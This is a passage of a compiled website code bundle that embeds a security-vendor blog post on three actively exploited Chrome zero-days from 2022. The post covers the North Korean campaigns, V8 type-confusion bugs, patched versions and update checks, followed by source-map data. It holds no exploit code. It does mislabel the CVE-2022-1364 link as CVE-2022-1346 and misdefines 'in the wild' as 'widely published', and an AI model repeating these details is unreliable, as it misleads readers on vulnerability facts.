\",/*#__PURE__*/e(o,{href:\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0609\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"CVE-2022-0609\"})}),\". (CVSS 3.1 base score: \",/*#__PURE__*/e(o,{href:\"https://nvd.nist.gov/vuln/detail/CVE-2022-0609\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"8.8\"})}),\".) Apparently, the cybercriminals were associated with the notorious and powerful North Korean \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/lazarus-malware-cyberattack/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"criminal gang Lazarus\"})}),\". As \",/*#__PURE__*/e(o,{href:\"https://blog.google/threat-analysis-group/countering-threats-north-korea/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"reported by the researchers\"})}),\", these attackers used the same exploit kit, since they had a shared supply chain, but with different targets and techniques.\"]}),/*#__PURE__*/t(\"p\",{children:[\"One group (its activity is tracked as \",/*#__PURE__*/e(o,{href:\"https://www.clearskysec.com/operation-dream-job/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Operation Dream Job\"})}),\") targeted about ten news media and IT companies. Approximately 250 people from these firms received emails with sham job opportunities sent from Oracle, Google and Disney. These emails contained links \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/spoofing/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"spoofing\"})}),\" genuine recruiting websites. Once the person clicked on it, they received a hidden \",/*#__PURE__*/e(o,{href:\"https://www.techtarget.com/whatis/definition/IFrame-Inline-Frame\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"iframe\"})}),\" that activated the exploit kit. The other group (its activity is tracked as \",/*#__PURE__*/e(o,{href:\"https://securelist.com/operation-applejeus/87553/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Operation AppleJeus\"})}),\") targeted more than 85 users in cryptocurrency and fintech companies. According to \",/*#__PURE__*/e(o,{href:\"https://blog.google/threat-analysis-group/countering-threats-north-korea/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"the late March report\"})}),\", at least two websites were compromised, hosting hidden iframes to deliver the exploit kit to visitors. There were also fake websites directing visitors to the same kit.\"]}),/*#__PURE__*/t(\"p\",{children:[\"This exploit kit served a highly \",/*#__PURE__*/e(o,{href:\"https://en.wikipedia.org/wiki/Obfuscation_(software)\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"obfuscated\"})}),\" JavaScript to fingerprint the victim's system. It then collected data such as user-agent and resolution and sent it to the exploit server. If a certain number of unknown requirements were met, the user received a Chrome remote code execution (\",/*#__PURE__*/e(o,{href:\"https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-004/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"RCE\"})}),\") exploit along with additional JavaScript. Then, if the RCE was successful, the JavaScript requested a new phase called SBX, an acronym for Sandbox Escape. In these cases, the \",/*#__PURE__*/e(o,{href:\"https://medium.com/ssd-secure-disclosure/ios-vulnerabilities-3-sandbox-escape-cves-5233c92ad875\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:'\"attacker can execute'})}),' malicious code from a sandbox outside of an environment, forcing the device to run the code within it.\"']}),/*#__PURE__*/t(\"p\",{children:[\"In response to this first strike, Google updated its Stable channel to 98.0.4758.102 for Windows, Mac and Linux. Additionally, they included all identified websites and domains in their free \",/*#__PURE__*/e(o,{href:\"https://safebrowsing.google.com/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Safe Browsing\"})}),\" service \",/*#__PURE__*/e(o,{href:\"https://blog.google/threat-analysis-group/countering-threats-north-korea/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:'\"to protect users'})}),' from further exploitation.\"']}),/*#__PURE__*/e(\"h2\",{children:\"Second strike: CVE-2022-1096\"}),/*#__PURE__*/t(\"p\",{children:[\"The news of the previous strike was still fresh when Google \",/*#__PURE__*/e(o,{href:\"https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"reported\"})}),\" an urgent update due to a second zero-day vulnerability in Chrome. They were informed by an anonymous party about this bug (\",/*#__PURE__*/e(o,{href:\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1096\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"CVE-2022-1096\"})}),\") on March 23. In the release update, only about two days later, they admitted being aware of the existence of an exploit in the wild (i.e., widely published) for this \\\"high\\\" severity vulnerability. (There's yet no official CVSS score for this vulnerability.) But additional information was kept by them to a minimum. At this time, unlike in the previous case, there is no dedicated post on Google's TAG's \",/*#__PURE__*/e(o,{href:\"https://blog.google/threat-analysis-group/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"official blog\"})}),\". As they pointed out, \",/*#__PURE__*/e(o,{href:\"https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:'\"Access to bug'})}),' details and links may be kept restricted until a majority of users are updated with a fix.\"']}),/*#__PURE__*/t(\"p\",{children:[\"Based on their report and \",/*#__PURE__*/e(o,{href:\"https://therecord.media/google-releases-emergency-security-update-for-chrome-users-after-second-0-day-of-2022-discovered/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"what we've seen\"})}),\" \",/*#__PURE__*/e(o,{href:\"https://threatpost.com/google-chrome-bug-actively-exploited-zero-day/179161/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"on the web\"})}),\", we know this is a type-confusion vulnerability in the Chrome \",/*#__PURE__*/e(o,{href:\"https://v8.dev/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"V8\"})}),\" JavaScript and WebAssembly engine. In this bug, pieces of software code in the middle of data execution operations do not verify the types of inputs they receive and may incorrectly process them as other types. Threat actors can take advantage of the software's subsequent logical errors to execute malicious code on victims' systems.\"]}),/*#__PURE__*/t(\"p\",{children:[\"The affected engine, V8, is an open-source component for processing JavaScript and WebAssembly code that Chrome and Chromium-based web browsers use. \",/*#__PURE__*/e(o,{href:\"https://www.zdnet.com/pictures/all-the-chromium-based-browsers/5/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"The latter include\"})}),\", for example, Microsoft Edge, Samsung Internet, Opera and Vivaldi. (\",/*#__PURE__*/e(o,{href:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Microsoft also informed\"})}),\" its users about this vulnerability and the new version of Edge promptly). So here we prefer to extend our initial warning: Make sure you have any of your web browsers up to date. It's worth noting that \",/*#__PURE__*/e(o,{href:\"https://www.cybersecurity-help.cz/blog/2471.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"16 zero-day vulnerabilities\"})}),\" were detected in Chrome in 2021. Eight of these were also present in V8. And \",/*#__PURE__*/e(o,{href:\"https://threatpost.com/google-chrome-bug-actively-exploited-zero-day/179161/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"three of them\"})}),\", like the one described in this segment, were type-confusion vulnerabilities: \",/*#__PURE__*/e(o,{href:\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"CVE-2021-21224\"})}),\", \",/*#__PURE__*/e(o,{href:\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"CVE-2021-30551\"})}),\" and \",/*#__PURE__*/e(o,{href:\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"CVE-2021-30563\"})}),\".\"]}),/*#__PURE__*/e(\"p\",{children:\"In response to this second strike, Google updated its Stable channel to 99.0.4844.84 for Windows, Mac and Linux.\"}),/*#__PURE__*/e(\"h2\",{children:\"Third strike: CVE-2022-1364\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://www.zdnet.com/article/google-fixes-chrome-zero-day-being-used-in-exploits-in-the-wild/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"April\"})}),\" brought more confusion. On the 13th, \",/*#__PURE__*/e(o,{href:\"https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Google's TAG reported\"})}),' another \"high\" severity type-confusion vulnerability in V8: ',/*#__PURE__*/e(o,{href:\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1364\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"CVE-2022-1346\"})}),\". (There's yet no official CVSS score for this vulnerability either.) The patch was available for all \",/*#__PURE__*/e(o,{href:\"https://www.forbes.com/sites/daveywinder/2022/04/17/emergency-security-update-for-32-billion-google-chrome-users-attacks-underway/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"3.2 billion Chrome users\"})}),\" the next day. However, Google again warned about the exploit's existence in the wild. Was this another hacking onslaught orchestrated by North Koreans? As in the previous case, we have to wait for a majority of users to update the web browser to get more details about this vulnerability.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In response to this third strike, Google updated its Stable channel to \",/*#__PURE__*/e(\"strong\",{children:\"100.0.4896.127\"}),\" for Windows, Mac and Linux. (Read about Microsoft Edge's new version \",/*#__PURE__*/e(o,{href:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1364\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"here\"})}),'.) If you want to check that your Chrome is updated, open a new browser window and go to the top right corner. Click on the three dots to open the drop-down menu and select the Settings option. Then, click the About Chrome option at the bottom of the menu on the left. Verify that you see the message \"Chrome is up to date\" and that the version number matches the one we give you here.']}),/*#__PURE__*/e(\"img\",{alt:\"About Chrome\",className:\"framer-image\",height:\"162\",src:\"https://framerusercontent.com/images/uGxjRUxEhC7bmZQCr9WylAF6c.png\",srcSet:\"https://framerusercontent.com/images/uGxjRUxEhC7bmZQCr9WylAF6c.png?scale-down-to=512 512w,https://framerusercontent.com/images/uGxjRUxEhC7bmZQCr9WylAF6c.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/uGxjRUxEhC7bmZQCr9WylAF6c.png 1441w\",style:{aspectRatio:\"1441 / 324\"},width:\"720\"}),/*#__PURE__*/e(\"p\",{children:\"Already three strikes were received by Google Chrome in 2022. Could we now determine a strikeout? Not in this game. It's enough to look back at the history of this software to say that they are likely to receive more strikes this year. Maybe this latest version we presented you here will be obsolete in a few days. So stay tuned for updates!\"}),/*#__PURE__*/t(\"p\",{children:[\"At Fluid Attacks, we are on the lookout for these and many, many other security vulnerabilities that may affect our clients. Thanks to our \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/services/continuous-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Continuous Hacking\"})}),\" service, with our \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/certifications/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"highly certified\"})}),\" team of pentesters, you can enhance your \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/what-is-vulnerability-management/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"vulnerability management\"})}),\" program and prevent your organization from receiving highly harmful impacts from cyberattacks. For more information, do not hesitate to \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/contact-us/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"contact us\"})}),\".\"]})]});export const richText15=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"Tons of vulnerabilities are found daily in all kinds of software. You can know this just by looking at the frequency with which the \",/*#__PURE__*/e(o,{href:\"https://twitter.com/cvenew/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"CVE Program tweets\"})}),'. This program identifies, defines and catalogs publicly disclosed cybersecurity vulnerabilities. In fact, you probably see \"CVE-...\" constantly in your news feed.']}),/*#__PURE__*/t(\"p\",{children:[\"Behind the constant flux of common vulnerabilities and exposures, there are the people constantly probing software, gathering vulnerability exploitation evidence and reporting it through the right channels. The Fluid Attacks Research Team does this too, and as we at Fluid Attacks are proudly a \",/*#__PURE__*/e(o,{href:\"https://www.cve.org/ResourcesSupport/AllResources/CNARules#section_1-1_cnas\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"CNA\"})}),\" (CVE Numbering Authority), the team gets to assign CVE IDs to the zero-day vulnerabilities they discover. After contacting the vendor of the affected software, a team member creates an advisory draft on our \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/advisories/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"dedicated webpage\"})}),\".\"]}),/*#__PURE__*/e(\"p\",{children:\"In this blog post, we would like to share some information about our Advisories that may shed some light on how the Fluid Attacks Research Team works.\"})]});\nexport const __FramerMetadata__ = {\"exports\":{\"richText14\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText3\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText7\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText10\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText6\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText11\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText5\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText9\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText13\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText15\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText12\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText8\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText1\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText2\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText4\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"__FramerMetadata__\":{\"type\":\"variable\"}}}"],"mappings":"udACa,AADb,GAAkD,IAA4D,IAAuC,IAAwB,IAA4G,CAAa,EAAsB,EAAA,EAAa,CAAC,SAAS,CAAc,EAAE,KAAK,CAAC,SAAS,UAAW,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,sFAAmG,EAAE,OAAO,CAAC,SAAS,gBAAiB,EAAC,CAAC,sCAAmD,EAAE,OAAO,CAAC,SAAS,eAAgB,EAAC,CAAC,KAAkB,EAAE,OAAO,CAAC,SAAS,oBAAqB,EAAC,CAAC,QAAqB,EAAE,OAAO,CAAC,SAAS,kBAAmB,EAAC,CAAC,qLAAsL,CAAC,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,CAAC,WAAwB,EAAE,OAAO,CAAC,SAAS,KAAM,EAAC,CAAC,eAA4B,EAAE,OAAO,CAAC,SAAS,gBAAiB,EAAC,CAAC,aAAc,CAAC,EAAC,AAAC,EAAC,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,gCAAiC,EAAC,AAAC,EAAC,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,CAAC,iCAA8C,EAAE,OAAO,CAAC,SAAS,gBAAiB,EAAC,CAAC,aAAc,CAAC,EAAC,AAAC,EAAC,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,CAAC,iCAA8C,EAAE,OAAO,CAAC,SAAS,gBAAiB,EAAC,CAAC,GAAI,CAAC,EAAC,AAAC,EAAC,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,CAAC,SAAsB,EAAE,OAAO,CAAC,SAAS,gBAAiB,EAAC,CAAC,GAAI,CAAC,EAAC,AAAC,EAAC,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,SAAU,EAAC,AAAC,EAAC,AAAC,CAAC,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,6CAA8C,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,6DAA0E,EAAE,OAAO,CAAC,SAAS,KAAM,EAAC,CAAC,YAAyB,EAAE,OAAO,CAAC,SAAS,gBAAiB,EAAC,CAAC,WAAY,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAEA,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;;;sEAAwZ,SAAS,IAAK,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,2FAAwG,EAAE,OAAO,CAAC,SAAS,QAAS,EAAC,CAAC,UAAW,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAED,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;;;4BAA0L,SAAS,QAAS,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,aAAc,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAED,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;sBAAwE,SAAS,IAAK,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,gBAAiB,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,+BAAgC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,0OAA2O,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAED,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;;;;;mEAAsP,SAAS,QAAS,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,OAAoB,EAAE,OAAO,CAAC,SAAS,gBAAiB,EAAC,CAAC,+BAA4C,EAAEC,EAAE,CAAC,KAAK,+FAA+F,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,MAAO,EAAC,AAAC,EAAC,CAAC,GAAI,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,kGAA+G,EAAE,OAAO,CAAC,SAAS,KAAM,EAAC,CAAC,IAAiB,EAAE,OAAO,CAAC,SAAS,OAAQ,EAAC,CAAC,2BAAwC,EAAE,OAAO,CAAC,SAAS,6BAA8B,EAAC,CAAC,QAAS,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAEH,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;qCAAqN,SAAS,IAAK,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,wBAAyB,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAED,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;;;;;;;;;6BAAwW,SAAS,QAAS,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,kDAAmD,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAED,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;;;;;;;;mBAAkZ,SAAS,IAAK,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,wCAAqD,EAAE,OAAO,CAAC,SAAS,kBAAmB,EAAC,CAAC,kGAAmG,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAED,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;;;;;;;gBAA0f,SAAS,IAAK,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,wDAAyD,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,kCAA+C,EAAE,OAAO,CAAC,SAAS,gBAAiB,EAAC,CAAC,qKAAkL,EAAE,OAAO,CAAC,SAAS,UAAW,EAAC,CAAC,gDAAiD,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,8BAA2C,EAAE,OAAO,CAAC,SAAS,2BAA4B,EAAC,CAAC,6CAA8C,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAED,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;qCAAqkC,SAAS,QAAS,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,aAAc,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAED,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;;;;;;;;;;;;;;KAAoqB,SAAS,IAAK,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,mCAAgD,EAAE,OAAO,CAAC,SAAS,UAAW,EAAC,CAAC,oCAAqC,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAED,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;KAAioE,SAAS,IAAK,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAc,EAAE,OAAO,CAAC,SAAS,UAAW,EAAC,CAAC,uEAAwE,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,6CAA0D,EAAE,OAAO,CAAC,SAAS,sBAAuB,EAAC,CAAC,oDAAiE,EAAE,OAAO,CAAC,SAAS,KAAM,EAAC,CAAC,+HAA4I,EAAE,OAAO,CAAC,SAAS,iBAAkB,EAAC,CAAC,0BAAuC,EAAE,OAAO,CAAC,SAAS,sBAAuB,EAAC,CAAC,+BAAgC,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,8GAA2H,EAAE,OAAO,CAAC,SAAS,4BAA6B,EAAC,CAAC,mPAAoP,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,UAAU,qBAAqB,MAAM,CAAC,OAAO,OAAO,MAAM,MAAO,EAAC,SAAsB,EAAED,EAAE,CAAC,oBAAoB,wEAAwE,SAAS,GAAgB,EAAEC,EAAE,CAAC,GAAG,EAAE,KAAK;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;EAAulD,SAAS,QAAS,EAAC,AAAC,EAAC,AAAC,EAAC,CAAc,EAAE,IAA